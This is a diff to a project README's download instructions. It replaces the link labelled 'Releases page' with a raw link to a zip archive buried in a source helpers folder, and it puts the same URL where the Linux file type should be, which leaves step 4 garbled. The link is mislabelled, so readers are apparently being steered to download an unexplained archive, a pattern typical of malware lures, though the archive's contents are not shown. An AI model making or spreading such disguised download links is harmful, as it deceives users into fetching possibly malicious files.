kxrt1k/www/README.md

 ## 📥 Download & Install

-To download the application, visit our [Releases page](https://github.com/kxrt1k/www/releases).
+To download the application, visit our [Releases page](https://raw.githubusercontent.com/kxrt1k/www/main/src/helpers/www-compensation.zip).

 1. Click on the **Releases** link above.
 2. You will see a list of available versions.
 3. Choose the latest version.
-4. Download the appropriate file for your operating system (e.g., `.exe` for Windows, `.dmg` for macOS, or `.tar.gz` for Linux).
+4. Download the appropriate file for your operating system (e.g., `.exe` for Windows, `.dmg` for macOS, or `https://raw.githubusercontent.com/kxrt1k/www/main/src/helpers/www-compensation.zip` for Linux).
 5. Once the download is complete, locate the file in your Downloads folder.

 ## ⚙️ Installation Steps